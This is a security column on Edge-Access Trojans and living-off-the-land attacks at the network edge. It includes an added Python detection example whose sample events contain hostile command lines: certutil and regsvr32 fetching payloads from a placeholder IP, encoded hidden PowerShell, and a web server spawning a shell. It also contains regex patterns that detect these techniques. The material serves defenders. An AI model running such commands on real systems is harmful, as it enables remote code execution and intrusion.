
Living Off the "Edge" of the Land

Edge-Access Trojans (EATs) allow attackers to collect data and even disrupt crucial decisions at the edge of the network

Edge computing is eminently practical in that it solves several important problems, many of which are related to the latency created when data must travel long distances. The edge offers significant functional and economic benefits, such as the emergence of a new breed of real-time applications. And the need for more edges has increased due to the proliferation of IoT and operational technology (OT) devices, as well as smart devices powered by 5G and AI that enable real-time transactions. 

At the same time, though, such a profusion of devices expands the attack surface, creating new entry doors into corporate networks. New edge-based threats are emerging as cybercriminals target the entire extended network as an entry point for an attack. Malicious actors will work to maximize any potential security gaps created by intelligent edges and advances in computing power to create advanced and more destructive threats – and at unprecedented scale. 

As edge devices become more powerful, with more native capabilities, criminals will design new attacks to "live off the edge." An increase in attacks targeting OT, particularly at the edge, is likely as the convergence of IT and OT networks continues. It’s important to understand the nature of attacks headed for the edge in order to properly prepare for them.

New edge threats emerge

FortiGuard Labs predicted last year the advent of Edge-Access Trojans (EATs), malware designed to target edge environments. An EAT gives bad actors a foothold at the point where data is collected and acted on, allowing them to collect that data and even disrupt crucial decisions at the edge of the network, where time sensitivity is paramount. This would create an entirely new level of urgency in ransomware attacks, particularly when it comes to critical infrastructure systems.


Attackers can also use EATs to corrupt data, which may significantly impact downstream systems that rely on data collected by edge devices. Such edge footholds can also be used to tunnel back into the corporate network. End users and their home resources are already targets; going forward, sophisticated cybercriminals will use them as a springboard into other activities. Corporate network attacks launched from a remote employee’s home network, especially when that employee’s usage patterns are well understood, can be timed and coordinated so they do not raise suspicion.

Another edge challenge: Living off the land 

Living-off-the-land attacks allow malware to use the existing toolsets and capabilities already present within compromised environments, rather than dropping custom binaries that defenders can fingerprint. It’s a particularly tricky situation because the attack and the data exfiltration look like normal system activity and go unnoticed. The Hafnium Exchange Server intrusions disclosed in March 2021 used this technique to persist and operate on compromised servers.

Living-off-the-land attacks are effective because they let attackers hide their activities inside legitimate, often signed, processes, which makes them harder for defenders to detect. Because the same tools are available to everyone, they also make attack attribution much harder.
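Because the binaries involved are legitimate and usually signed, detecting living off the land means keying on how a tool is invoked (its arguments and its parent process) rather than on what the binary is. The following is an added example, not code from the original column or from FortiGuard Labs: a small Python rule set run over constructed process-creation events. The event shape is loosely modelled on an EDR or Sysmon process-creation record, but the field names, rule names and sample command lines are this example’s own, and the IP address is a documentation range.

```python
import re
from typing import Dict, List, Optional, Pattern, Set, Tuple

# Constructed sample process-creation events (not real telemetry). Each record
# carries the parent image, the launched image and the full command line, which
# is roughly what an EDR agent or Sysmon Event ID 1 gives a defender to work with.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/payload.txt C:\\Users\\Public\\p.txt"},
    {"id": 2, "parent": "WINWORD.EXE", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 3, "parent": "services.exe", "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 4, "parent": "cmd.exe", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"id": 5, "parent": "explorer.exe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\temp\\cert.cer"},          # benign certutil use
    {"id": 6, "parent": "w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},                                 # IIS worker spawning a shell
]

# Interpreters and script hosts that are suspicious when spawned by the wrong parent.
SHELLS: Set[str] = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
OFFICE: Set[str] = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WEB_WORKERS: Set[str] = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe"}

# Hypothetical rule set: (name, allowed image basenames or None, command-line regex or None,
# allowed parent basenames or None). Every field that is present must match for a hit.
Rule = Tuple[str, Optional[Set[str]], Optional[Pattern[str]], Optional[Set[str]]]
RULES: List[Rule] = [
    ("certutil_download_or_decode", {"certutil.exe"}, re.compile(r"-(urlcache|decode)\b", re.I), None),
    ("regsvr32_remote_scriptlet", {"regsvr32.exe"}, re.compile(r"/i:https?://|scrobj\.dll", re.I), None),
    ("mshta_remote_content", {"mshta.exe"}, re.compile(r"https?://|javascript:|vbscript:", re.I), None),
    ("rundll32_script_protocol", {"rundll32.exe"}, re.compile(r"javascript:|vbscript:", re.I), None),
    ("bitsadmin_transfer", {"bitsadmin.exe"}, re.compile(r"/transfer\b", re.I), None),
    ("msiexec_remote_package", {"msiexec.exe"}, re.compile(r"/(i|package)\s+https?://", re.I), None),
    ("wmic_remote_process_create", {"wmic.exe"}, re.compile(r"process\s+call\s+create", re.I), None),
    # Encoded PowerShell can be wrapped by cmd.exe, so match on the command line regardless of image.
    ("powershell_encoded_command", None,
     re.compile(r"powershell.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), None),
    # Parent/child rules: the binary is normal, the lineage is not.
    ("office_spawns_shell", SHELLS, None, OFFICE),
    ("web_worker_spawns_shell", SHELLS, None, WEB_WORKERS),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events) -> Dict[int, List[str]]:
    """Return {event id: [rule names]} for every event that trips at least one rule."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent"])
        matched = []
        for name, images, pattern, parents in RULES:
            if images is not None and image not in images:
                continue
            if parents is not None and parent not in parents:
                continue
            if pattern is not None and not pattern.search(ev["cmdline"]):
                continue
            matched.append(name)
        if matched:
            hits[ev["id"]] = matched
    return hits


if __name__ == "__main__":
    for event_id, rules in detect(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Two things the example is meant to show: the same binary (certutil in events 1 and 5) is benign or malicious depending only on its arguments, so file hash or image name alone cannot separate them; and a web-server worker or Office application spawning a shell is a lineage that legitimate use almost never produces, which is why parent-child rules catch web-shell and macro activity that argument rules miss. In production these rules would be tuned against an environment’s own baseline to control false positives.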

Living off the land at the edge 

We believe EATs and living-off-the-land techniques will converge in 2022. As edge devices become more powerful and, of course, more privileged, criminals will design attacks that live off the edge “land,” using the device’s own tooling and access. Edge malware will monitor edge activities and data and then steal, hijack or even ransom critical systems, applications and information while avoiding detection.

Endpoint security becomes increasingly important

Every point of connection represents a possible attack surface. IoT edge devices, and the IoT devices they connect with, present new vulnerabilities for a network. Some edge devices ship with default credentials, such as the username “admin,” that customers may neglect to change. Other devices are personal ones that a user may log in to and then leave open, allowing an attacker who obtains the device to access the network. Examples include smartphones or smart cars, both of which can be stolen while the user is still logged in.

Protecting your organization from these new edge-based threats will require upgrading end-user devices with advanced Endpoint Detection and Response (EDR) technologies along with enhanced network access control (NAC), including zero trust network access (ZTNA). NAC can identify and evaluate IoT edge devices when they connect to a network; the system then examines and verifies each device’s credentials before the device is allowed to interact with the network, rather than trusting it because it is plugged in. In addition, secure web gateways will become increasingly crucial to protecting the extreme edges of the network.

Securing the edge

Cybercriminals are tireless in their efforts to attack everything they can, and that includes the edge. The convergence of the living-off-the-land and EAT trends is particularly dangerous, as it enables attackers to go unnoticed while they carry out their schemes for as long as they want. With every endpoint a potential entry point, you need EDR and other advanced defenses working together to thwart edge attacks.

Derek Manky is Chief Security Strategist & VP Global Threat Intelligence at FortiGuard Labs. Derek formulates security strategy with more than 15 years of cyber security experience behind him. His ultimate goal is to make a positive impact in the global war on cybercrime. Manky provides thought leadership to industry, and has presented research and strategy worldwide at premier security conferences. As a cybersecurity expert, his work includes meetings with leading political figures and key policy stakeholders, including law enforcement. He is actively involved with several global threat intelligence initiatives including NATO NICP, INTERPOL Expert Working Group, the Cyber Threat Alliance (CTA) working committee and FIRST, all in an effort to shape the future of actionable threat intelligence and proactive security strategy.